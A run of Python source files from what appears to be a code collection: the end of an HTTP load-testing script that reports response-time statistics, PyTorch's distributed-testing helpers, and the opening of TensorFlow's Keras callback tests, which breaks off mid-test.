# username, password, url, request type and url endpoint
with open('config/authentication.json', 'r') as login_params:
authentication = json.load(login_params)
# Parse User Command Line Arguments
parser = argparse.ArgumentParser(description='Spawn multiple HTTP request threads to request specified URL.')
parser.add_argument("--concurrency", dest="concurrency", type=int, default=1, required=False, help='number of users simultaneously requesting pages (ex. --concurrency 15)')
args = parser.parse_args()
user_args = vars(args)
# Configurable Parameter Defaults
concurrency = user_args['concurrency']
timeout = {"read": 5, "connect": 5}
# Send Parallel URL Requests
# Note: Number of worker processes is bound by host
# Too many subprocesses yields OSOSError: [Errno 35] Resource temporarily unavailable
# This should be configurable on your OS
print("\nSpawning: \n\t%s subprocesses for %s simultaneous requests of page" %(concurrency, concurrency))
# Spawn a process for every request instance
for x in range(0,concurrency):
count += 1
p = Process(target=send_http_request, args=(results, times, url_details, authentication, timeout, lock, count,))
subprocesses.append(p)
p.start()
# Wait for all processes to complete
for subprocess in subprocesses:
subprocess.join()
# Calculate average response time
# Average Time in seconds
avg_time = "N/A"
if len(times) > 0:
avg_time = float(sum(times)/len(times))/1000000
# Print Results to Console
# JW: TODO clean these up so they don't throw exceptions for empty data setsg
print("\nAll Requests Sent:")
print("\tValid Response: %s" %(results["Valid Response"]))
print("\tConnection Error: %s" %(results["Connection Error"]))
print("\tRead Timeout: %s" %(results["Read Timeout"]))
print("\tConnect Timeout: %s\n" %(results["Connect Timeout"]))
print("Average Response Time:\n\t%s seconds" %(str(avg_time)))
print("Minimum Response Time:\n\t%s seconds" %(str(float(min(times))/1000000)))
print("Maximum Response Time:\n\t%s seconds" %(str(float(max(times))/1000000)))
print("Median Response Time:\n\t%s seconds" %(np.median(times)/1000000))
print("Standard Deviation:\n\t%s seconds\n" %(np.std(times)/1000000))
|
common_distributed.py | # From PyTorch:
#
# Copyright (c) 2016- Facebook, Inc (Adam Paszke)
# Copyright (c) 2014- Facebook, Inc (Soumith Chintala)
# Copyright (c) 2011-2014 Idiap Research Institute (Ronan Collobert)
# Copyright (c) 2012-2014 Deepmind Technologies (Koray Kavukcuoglu)
# Copyright (c) 2011-2012 NEC Laboratories America (Koray Kavukcuoglu)
# Copyright (c) 2011-2013 NYU (Clement Farabet)
# Copyright (c) 2006-2010 NEC Laboratories America (Ronan Collobert, Leon Bottou, Iain Melvin, Jason Weston)
# Copyright (c) 2006 Idiap Research Institute (Samy Bengio)
# Copyright (c) 2001-2004 Idiap Research Institute (Ronan Collobert, Samy Bengio, Johnny Mariethoz)
#
# From Caffe2:
#
# Copyright (c) 2016-present, Facebook Inc. All rights reserved.
#
# All contributions by Facebook:
# Copyright (c) 2016 Facebook Inc.
#
# All contributions by Google:
# Copyright (c) 2015 Google Inc.
# All rights reserved.
#
# All contributions by Yangqing Jia:
# Copyright (c) 2015 Yangqing Jia
# All rights reserved.
#
# All contributions by Kakao Brain:
# Copyright 2019-2020 Kakao Brain
#
# All contributions from Caffe:
# Copyright(c) 2013, 2014, 2015, the respective contributors
# All rights reserved.
#
# All other contributions:
# Copyright(c) 2015, 2016 the respective contributors
# All rights reserved.
#
# Caffe2 uses a copyright model similar to Caffe: each contributor holds
# copyright over their contributions to Caffe2. The project versioning records
# all such contribution and copyright details. If a contributor wants to further
# mark their specific copyright on a particular contribution, they should
# indicate their copyright solely in the commit message of the change when it is
# committed.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the names of Facebook, Deepmind Technologies, NYU, NEC Laboratories America
# and IDIAP Research Institute nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# This file is copied from https://github.com/pytorch/pytorch/tree/v1.9.0/torch/testing/_internal/common_distributed.py
# flake8: noqa
from contextlib import contextmanager
from datetime import timedelta
from enum import Enum
import faulthandler
from multiprocessing import Manager
from io import StringIO
import os
import sys
import tempfile
import threading
import time
import unittest
import logging
import traceback
import types
from typing import NamedTuple, Optional, Union
from functools import wraps
import torch
import torch.distributed as c10d
import torch.cuda.nccl
from functools import partial, reduce
from tests.internal.torch.common_utils import (
TestCase,
TEST_WITH_ROCM,
FILE_SCHEMA,
find_free_port,
retry_on_connect_failures,
)
logger = logging.getLogger(__name__)
class TestSkip(NamedTuple):
exit_code: int
message: str
TEST_SKIPS = {
"backend_unavailable": TestSkip(
72, "Skipped because distributed backend is not available."
),
"small_worldsize": TestSkip(73, "Skipped due to small world size."),
"no_cuda": TestSkip(74, "CUDA is not available."),
"multi-gpu": TestSkip(75, "Need at least 2 CUDA devices"),
"nccl": TestSkip(76, "c10d not compiled with NCCL support"),
"skipIfRocm": TestSkip(78, "Test skipped for ROCm"),
"no_peer_access": TestSkip(79, "Test skipped because no GPU peer access"),
}
def skip_if_no_gpu(func):
"""Nccl multigpu tests require at least 2 GPUS. Skip if this is not met"""
@wraps(func)
def wrapper(*args, **kwargs):
if not torch.cuda.is_available():
sys.exit(TEST_SKIPS["no_cuda"].exit_code)
if torch.cuda.device_count() < int(os.environ["WORLD_SIZE"]):
message = "Need at least {} CUDA devices".format(os.environ["WORLD_SIZE"])
TEST_SKIPS["multi-gpu"] = TestSkip(75, message)
sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
return func(*args, **kwargs)
return wrapper
def skip_if_small_worldsize(func):
@wraps(func)
def wrapper(*args, **kwargs):
if (os.environ["BACKEND"] != "mpi") and int(os.environ["WORLD_SIZE"]) <= 2:
sys.exit(TEST_SKIPS["small_worldsize"].exit_code)
return func(*args, **kwargs)
return wrapper
def require_n_gpus_for_nccl_backend(n, backend):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if backend == "nccl" and torch.cuda.device_count() < n:
message = "Need at least {} CUDA devices".format(n)
TEST_SKIPS["multi-gpu"] = TestSkip(75, message)
sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
else:
return func(*args, **kwargs)
return wrapper
return decorator
def skip_if_lt_x_gpu(x):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if torch.cuda.is_available() and torch.cuda.device_count() >= x:
return func(*args, **kwargs)
message = "Need at least {} CUDA devices".format(x)
TEST_SKIPS["multi-gpu"] = TestSkip(75, message)
sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
return wrapper
return decorator
# This decorator helps avoiding initializing cuda while testing other backends
def nccl_skip_if_lt_x_gpu(backend, x):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if backend != "nccl":
return func(*args, **kwargs)
if torch.cuda.is_available() and torch.cuda.device_count() >= x:
return func(*args, **kwargs)
message = "Need at least {} CUDA devices".format(x)
TEST_SKIPS["multi-gpu"] = TestSkip(75, message)
sys.exit(TEST_SKIPS["multi-gpu"].exit_code)
return wrapper
return decorator
def with_nccl_blocking_wait(func):
"""
Convenience decorator to set/unset NCCL_BLOCKING_WAIT flag. Note that use of
this decorator will override the setting of NCCL_ASYNC_ERROR_HANDLING for
the particular test. After the test, both NCCL_BLOCKING_WAIT and
NCCL_ASYNC_ERROR_HANDLING will be restored to their original values.
"""
@wraps(func)
def wrapper(*args, **kwargs):
# Save and unset NCCL_ASYNC_ERROR_HANDLING
try:
cached_nccl_async_error_handling: Union[str, None] = os.environ[
"NCCL_ASYNC_ERROR_HANDLING"
]
del os.environ["NCCL_ASYNC_ERROR_HANDLING"]
except KeyError:
# NCCL_ASYNC_ERROR_HANDLING was unset
cached_nccl_async_error_handling = None
# Save val of NCCL_BLOCKING_WAIT and set it.
try:
cached_nccl_blocking_wait: Union[str, None] = os.environ[
"NCCL_BLOCKING_WAIT"
]
except KeyError:
cached_nccl_blocking_wait = None
finally:
os.environ["NCCL_BLOCKING_WAIT"] = "1"
try:
ret = func(*args, **kwargs)
return ret
finally:
# restore old values.
if cached_nccl_async_error_handling is not None:
os.environ[
"NCCL_ASYNC_ERROR_HANDLING"
] = cached_nccl_async_error_handling
if cached_nccl_blocking_wait is not None:
os.environ["NCCL_BLOCKING_WAIT"] = cached_nccl_blocking_wait
return wrapper
def with_dist_debug_levels(levels):
"""
Runs a test for each distributed debug level specified in levels.
"""
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
old_level = os.environ.get("TORCH_DISTRIBUTED_DEBUG", None)
for level in levels:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = level
ret = func(*args, **kwargs)
if old_level is not None:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = old_level
# Only returns test return for last test, but since these are
# unittests the return value is not really used and earlier tests
# would've raised had they failed.
return ret
return wrapper
return decorator
def requires_gloo():
return unittest.skipUnless(
c10d.is_gloo_available(),
"c10d was not compiled with the Gloo backend",
)
def requires_nccl_version(version, msg):
if not c10d.is_nccl_available():
return unittest.skip(
"c10d was not compiled with the NCCL backend",
)
else:
return unittest.skipIf(
torch.cuda.nccl.version() < version,
"Requires NCCL version greater than or equal to: {}, found: {}, reason: {}".format(
version, torch.cuda.nccl.version(), msg
),
)
def requires_nccl():
return unittest.skipUnless(
c10d.is_nccl_available(),
"c10d was not compiled with the NCCL backend",
)
def requires_mpi():
return unittest.skipUnless(
c10d.is_mpi_available(),
"c10d was not compiled with the MPI backend",
)
def skip_if_rocm_single_process(func):
"""Skips a test for ROCm in a single process environment"""
func.skip_if_rocm = True
@wraps(func)
def wrapper(*args, **kwargs):
if not TEST_WITH_ROCM:
return func(*args, **kwargs)
raise unittest.SkipTest("Test skipped for ROCm")
return wrapper
def skip_if_rocm(func):
"""Skips a test for ROCm"""
func.skip_if_rocm = True
@wraps(func)
def wrapper(*args, **kwargs):
if not TEST_WITH_ROCM:
return func(*args, **kwargs)
sys.exit(TEST_SKIPS["skipIfRocm"].exit_code)
return wrapper
def skip_if_win32():
return unittest.skipIf(
sys.platform == "win32",
"This unit test case is not supportted on Windows platform",
)
@retry_on_connect_failures
def create_tcp_store(
addr="localhost",
world_size=1,
is_master=True,
timeout=timedelta(minutes=5),
wait_for_workers=True,
jit_class=False,
):
"""
Creates a TCP store. Retries if the chosen port is already in use.
"""
port = find_free_port()
if jit_class:
timeout_millisecond = int(timeout / timedelta(milliseconds=1))
return torch.classes.dist_c10d.TCPStore(
addr, port, world_size, is_master, timeout_millisecond
)
else:
return c10d.TCPStore(
addr, port, world_size, is_master, wait_for_workers=wait_for_workers
)
TIMEOUT_DEFAULT = 100
TIMEOUT_OVERRIDE = {"test_ddp_uneven_inputs": 400}
def create_device(interface=None):
if sys.platform == "win32" or interface is None:
return c10d.ProcessGroupGloo.create_device(hostname="127.0.0.1")
else:
return c10d.ProcessGroupGloo.create_device(interface=interface)
def get_timeout(test_id) -> int:
return TIMEOUT_OVERRIDE.get(test_id.split(".")[-1], TIMEOUT_DEFAULT)
@contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
def simple_sparse_reduce_tests(rank: int, world_size: int, num_inputs: int = 1):
"""
Generate a number of basic test cases for sparse reduction.
These cover tensors with a varying number of sparse dimensions and a varying
number of dense dimensions. The only reduction operation we support is sum.
"""
def generate(rank: int, world_size: int, sparse_dims: int = 1, dense_dims: int = 0):
# First sparse dimension is [0..rank].
# Subsequent dimensions are always 0, so we know there is
# a non-empty intersection between any two sparse tensors.
indices = torch.reshape(torch.arange(rank + 1), (1, rank + 1))
shape = [world_size] + [2 for _ in range(dense_dims)]
for _ in range(sparse_dims - 1):
indices = torch.cat((indices, torch.zeros(1, rank + 1)))
shape.append(world_size)
values = torch.ones([rank + 1] + [2 for _ in range(dense_dims)])
return torch.sparse_coo_tensor(indices, values, shape)
def compute_sum(fn, world_size: int):
return reduce(
lambda a, b: a + b, [fn(rank, world_size) for rank in range(world_size)]
)
return [
(
[
fn(num_inputs * rank + i, num_inputs * world_size)
for i in range(num_inputs)
],
[compute_sum(fn, num_inputs * world_size) for i in range(num_inputs)],
)
for fn in [
partial(generate, sparse_dims=1),
partial(generate, sparse_dims=2),
partial(generate, sparse_dims=3),
partial(generate, dense_dims=1),
partial(generate, dense_dims=2),
partial(generate, dense_dims=3),
]
]
tmp_dir: Optional[tempfile.TemporaryDirectory] = None
def initialize_temp_directories(init_method: Optional[str] = None) -> None:
global tmp_dir
tmp_dir = tempfile.TemporaryDirectory()
os.environ["TEMP_DIR"] = tmp_dir.name
os.mkdir(os.path.join(tmp_dir.name, "barrier"))
os.mkdir(os.path.join(tmp_dir.name, "test_dir"))
init_dir_path = os.path.join(tmp_dir.name, "init_dir")
os.mkdir(init_dir_path)
# Set init method if specified.
if init_method is not None:
os.environ["INIT_METHOD"] = init_method
else:
os.environ["INIT_METHOD"] = FILE_SCHEMA + os.path.join(
init_dir_path, "shared_init_file"
)
def cleanup_temp_dir() -> None:
if tmp_dir is not None:
tmp_dir.cleanup()
# [How does MultiProcessTestCase work?]
# Each MultiProcessTestCase instance uses 1 + `world_size()` processes, by
# default `world_size()` returns 4. Let's take `test_rpc_spawn.py` as an
# example which inherits from this class. Its `Setup()` methods calls into
# `MultiProcessTestCase._spawn_processes()` which spawns `world_size()`
# subprocesses. During the spawn, the main process passes the test name to
# subprocesses, and the name is acquired from self.id(). The subprocesses
# then use the provided test function name to retrieve the function attribute
# from the test instance and run it. The main process simply waits for all
# subprocesses to join.
class MultiProcessTestCase(TestCase):
MAIN_PROCESS_RANK = -1
# This exit code is used to indicate that the test code had an error and
# exited abnormally. There are certain tests that might use sys.exit() to
# simulate failures and in those cases, we can't have an exit code of 0,
# but we still want to ensure we didn't run into any other errors.
TEST_ERROR_EXIT_CODE = 10
# do not early terminate for distributed tests.
def _should_stop_test_suite(self) -> bool:
return False
@property
def world_size(self) -> int:
return 4
def join_or_run(self, fn):
@wraps(fn)
def wrapper(self):
if self.rank == self.MAIN_PROCESS_RANK:
self._join_processes(fn)
else:
fn()
return types.MethodType(wrapper, self)
# The main process spawns N subprocesses that run the test.
# Constructor patches current instance test method to
# assume the role of the main process and join its subprocesses,
# or run the underlying test function.
def __init__(self, method_name: str = "runTest") -> None:
super().__init__(method_name)
fn = getattr(self, method_name)
setattr(self, method_name, self.join_or_run(fn))
def setUp(self) -> None:
super().setUp()
self.skip_return_code_checks = [] # type: ignore[var-annotated]
self.processes = [] # type: ignore[var-annotated]
self.rank = self.MAIN_PROCESS_RANK
self.file_name = tempfile.NamedTemporaryFile(delete=False).name
global TEST_SKIPS
self.old_test_skips = TEST_SKIPS.copy()
# pid to pipe consisting of error message from process.
self.pid_to_pipe = {} # type: ignore[var-annotated]
def tearDown(self) -> None:
super().tearDown()
for p in self.processes:
p.terminate()
# Each Process instance holds a few open file descriptors. The unittest
# runner creates a new TestCase instance for each test method and keeps
# it alive until the end of the entire suite. We must thus reset the
# processes to prevent an effective file descriptor leak.
self.processes = []
def _current_test_name(self) -> str:
# self.id() == e.g. '__main__.TestDistributed.TestAdditive.test_get_rank'
return self.id().split(".")[-1]
def _start_processes(self, proc) -> None:
test_skips_manager = Manager()
test_skips = test_skips_manager.dict()
global TEST_SKIPS
test_skips.update(TEST_SKIPS)
TEST_SKIPS = test_skips
self.processes = []
for rank in range(int(self.world_size)):
parent_conn, child_conn = torch.multiprocessing.Pipe()
process = proc(
target=self.__class__._run,
name="process " + str(rank),
args=(rank, self._current_test_name(), self.file_name, child_conn),
)
process.start()
logger.info(f"Started process {rank} with pid {process.pid}")
self.pid_to_pipe[process.pid] = parent_conn
self.processes.append(process)
def _fork_processes(self) -> None:
proc = torch.multiprocessing.get_context("fork").Process
self._start_processes(proc)
def _spawn_processes(self) -> None:
proc = torch.multiprocessing.get_context("spawn").Process
self._start_processes(proc)
class Event(Enum):
GET_TRACEBACK = 1
@staticmethod
def _event_listener(pipe, rank: int):
logger.info(f"Starting event listener thread for {rank}")
while True:
if pipe.poll(None):
if pipe.closed:
logger.info(
f"Pipe closed for process {rank}, stopping event listener thread"
)
return
event = pipe.recv()
logger.info(f"Received event {event} on process {rank}")
if event == MultiProcessTestCase.Event.GET_TRACEBACK:
# Return traceback to the parent process.
with tempfile.NamedTemporaryFile(mode="r+") as tmp_file:
faulthandler.dump_traceback(tmp_file)
# Flush buffers and seek to read from the beginning
tmp_file.flush()
tmp_file.seek(0)
pipe.send(tmp_file.read())
logger.info(f"Process {rank} sent traceback")
@classmethod
def _run(cls, rank: int, test_name: str, file_name: str, pipe) -> None:
self = cls(test_name)
# Start event listener thread.
threading.Thread(
target=MultiProcessTestCase._event_listener, args=(pipe, rank), daemon=True
).start()
self.rank = rank
self.file_name = file_name
self.run_test(test_name, pipe)
# exit to avoid run teardown() for fork processes
sys.exit(0)
def run_test(self, test_name: str, pipe) -> None:
if sys.platform != "win32" and sys.platform != "darwin":
# Register signal handler to dump stack traces on FATALs.
# Windows and MacOS do not support the signal handlers.
torch._C._set_print_stack_traces_on_fatal_signal(True) # type: ignore[attr-defined]
# self.id() == e.g. '__main__.TestDistributed.test_get_rank'
# We're retrieving a corresponding test and executing it.
try:
getattr(self, test_name)()
# Close pipe after done with test.
pipe.close()
except Exception as e:
logger.error(
f"Caught exception: \n{traceback.format_exc()} exiting "
"process with exit code: {MultiProcessTestCase.TEST_ERROR_EXIT_CODE}"
)
# Send error to parent process.
pipe.send(traceback.format_exc())
pipe.close()
sys.exit(MultiProcessTestCase.TEST_ERROR_EXIT_CODE)
def _get_timedout_process_traceback(self) -> None:
pipes = []
for i, process in enumerate(self.processes):
if process.exitcode is None:
pipe = self.pid_to_pipe[process.pid]
try:
pipe.send(MultiProcessTestCase.Event.GET_TRACEBACK)
pipes.append((i, pipe))
except BrokenPipeError as e:
logger.error(
f"Encountered error while trying to get traceback for process {i}: {e}"
)
# Wait for results.
for rank, pipe in pipes:
# Wait for traceback
if pipe.poll(5):
if pipe.closed:
logger.info(
f"Pipe closed for process {rank}, cannot retrieve traceback"
)
continue
traceback = pipe.recv()
logger.error(
f"Process {rank} timed out with traceback: \n\n{traceback}"
)
else:
logger.error(
f"Could not retrieve traceback for timed out process: {rank}"
)
def _join_processes(self, fn) -> None:
timeout = get_timeout(self.id())
start_time = time.time()
subprocess_error = False
try:
while True:
# check to see if any subprocess exited with an error early.
for (i, p) in enumerate(self.processes):
# This is the exit code processes exit with if they
# encountered an exception.
if p.exitcode == MultiProcessTestCase.TEST_ERROR_EXIT_CODE:
print(
f"Process {i} terminated with exit code {p.exitcode}, terminating remaining processes."
)
active_children = torch.multiprocessing.active_children()
for ac in active_children:
ac.terminate()
subprocess_error = True
break
if subprocess_error:
break
# All processes have joined cleanly if they all a valid exitcode
if all([p.exitcode is not None for p in self.processes]):
break
# Check if we should time out the test. If so, we terminate each process.
elapsed = time.time() - start_time
if elapsed > timeout:
self._get_timedout_process_traceback()
print(
f"Timing out after {timeout} seconds and killing subprocesses."
)
for p in self.processes:
p.terminate()
break
# Sleep to avoid excessive busy polling.
time.sleep(0.1)
elapsed_time = time.time() - start_time
if fn in self.skip_return_code_checks:
self._check_no_test_errors(elapsed_time)
else:
self._check_return_codes(elapsed_time)
finally:
# Close all pipes
for pid, pipe in self.pid_to_pipe.items():
pipe.close()
global TEST_SKIPS
TEST_SKIPS = self.old_test_skips
def _check_no_test_errors(self, elapsed_time) -> None:
"""
Checks that we didn't have any errors thrown in the child processes.
"""
for i, p in enumerate(self.processes):
if p.exitcode is None:
raise RuntimeError(
"Process {} timed out after {} seconds".format(i, elapsed_time)
)
self.assertNotEqual(self.TEST_ERROR_EXIT_CODE, p.exitcode)
def _check_return_codes(self, elapsed_time) -> None:
"""
Checks that the return codes of all spawned processes match, and skips
tests if they returned a return code indicating a skipping condition.
"""
first_process = self.processes[0]
# first, we check if there are errors in actual processes
# (via TEST_ERROR_EXIT CODE), and raise an exception for those.
# the reason we do this is to attempt to raise a more helpful error
# message than "Process x terminated/timed out"
# TODO: we should pipe the exception of the failed subprocess here.
# Currently, the actual exception is displayed as a logging output.
errored_processes = [
(i, p)
for i, p in enumerate(self.processes)
if p.exitcode == MultiProcessTestCase.TEST_ERROR_EXIT_CODE
]
if errored_processes:
error = ""
for i, process in errored_processes:
# Get error from pipe.
error_message = self.pid_to_pipe[process.pid].recv()
error += (
"Process {} exited with error code {} and exception:\n{}\n".format(
i, MultiProcessTestCase.TEST_ERROR_EXIT_CODE, error_message
)
)
raise RuntimeError(error)
# If no process exited uncleanly, we check for timeouts, and then ensure
# each process exited cleanly.
for i, p in enumerate(self.processes):
if p.exitcode is None:
raise RuntimeError(
"Process {} terminated or timed out after {} seconds".format(
i, elapsed_time
)
)
self.assertEqual(
p.exitcode,
first_process.exitcode,
msg="Expect process {} exit code to match Process 0 exit code of {}, but got {}".format(
i, first_process.exitcode, p.exitcode
),
)
for skip in TEST_SKIPS.values():
if first_process.exitcode == skip.exit_code:
raise unittest.SkipTest(skip.message)
self.assertEqual(
first_process.exitcode,
0,
msg="Expected zero exit code but got {}".format(first_process.exitcode),
)
@property
def is_master(self) -> bool:
return self.rank == 0
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
from tensorflow.python.training import checkpoint_management
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2 if not is_sequence else None,
steps_per_epoch=5 if is_sequence else None,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
training_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
